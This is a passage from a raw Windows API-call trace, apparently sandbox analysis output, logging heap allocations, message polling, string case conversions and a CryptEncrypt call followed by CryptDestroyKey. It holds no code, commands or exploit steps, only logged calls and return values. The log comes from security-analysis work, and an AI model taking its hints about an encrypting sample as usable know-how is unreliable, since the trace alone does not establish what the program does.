(in: lpsz="byte[61512]", cchLength=0xb | out: lpsz="byte[61512]") returned 0xb [0207.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0207.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0207.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0207.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0207.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0207.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0207.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0207.402] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0207.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0207.403] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0207.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0207.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0207.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0207.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0207.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0207.403] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0207.405] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0207.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0207.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0207.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0207.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0207.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0207.405] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0207.405] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.405] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0207.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0207.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0207.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0207.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0207.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0207.406] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0207.406] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.406] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0207.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0207.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0207.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0207.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0207.406] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0207.406] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0207.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0207.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0207.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0207.407] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0207.407] CryptEncrypt (in: hKey=0xaa5760, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34d02f0*, pdwDataLen=0x8bef68*=0xf044, dwBufLen=0xf048 | out: pbData=0x34d02f0*, pdwDataLen=0x8bef68*=0xf048) returned 1 [0207.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0207.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0207.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0190 [0207.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0207.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0207.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0207.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0160 [0207.408] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a01a0 [0207.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a01c0 [0207.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0170 [0207.408] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0207.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0207.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0207.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0207.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a01e0 [0207.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0207.409] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.409] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a01a0 [0207.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0207.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0207.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a01c0 [0207.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0207.409] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0207.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0207.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0207.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0207.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0207.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0207.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0207.409] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0207.410] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0207.410] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.410] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0207.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0207.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0207.411] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0207.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0207.411] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0207.411] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0207.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0207.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0207.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0207.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0207.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0207.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0207.411] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0207.411] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0207.411] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0207.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0207.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0207.411] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0207.411] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0207.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0207.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0207.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0207.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0207.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0207.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0207.412] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0207.412] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0207.412] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0207.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0207.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0207.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0207.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0207.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0207.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0207.412] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0207.412] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0207.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0207.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0207.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0207.413] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0207.413] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0207.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0207.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0207.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0207.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0207.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0207.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0207.413] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0207.413] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0207.413] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0207.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0207.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0207.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0207.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0207.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0207.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0207.413] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0207.413] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0207.413] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0207.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0207.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0207.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0207.419] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0207.419] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.419] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0207.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0207.419] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0207.421] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0207.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0207.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0207.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0207.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0207.422] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0207.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0207.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0207.422] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0207.422] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0207.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0207.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0207.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0207.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0207.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0207.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0207.422] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0207.422] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0207.422] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0207.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0207.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0207.422] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0207.423] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0207.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0207.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0207.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0207.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0207.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0207.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0207.423] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0207.423] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0207.423] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0207.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0207.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0207.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0207.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0207.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0207.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0207.423] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0207.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0207.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0207.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0207.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0207.424] CryptDestroyKey (hKey=0xaa5760) returned 1 [0207.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0207.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0207.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0207.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0207.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0207.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0207.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0207.424] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0207.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0207.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0207.424] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0207.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0207.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0207.424] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0207.424] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0207.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0207.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0207.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0207.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0207.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0207.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0207.425] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0207.425] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0207.425] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0207.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0207.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0207.425] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0207.425] PeekMessageW (in: 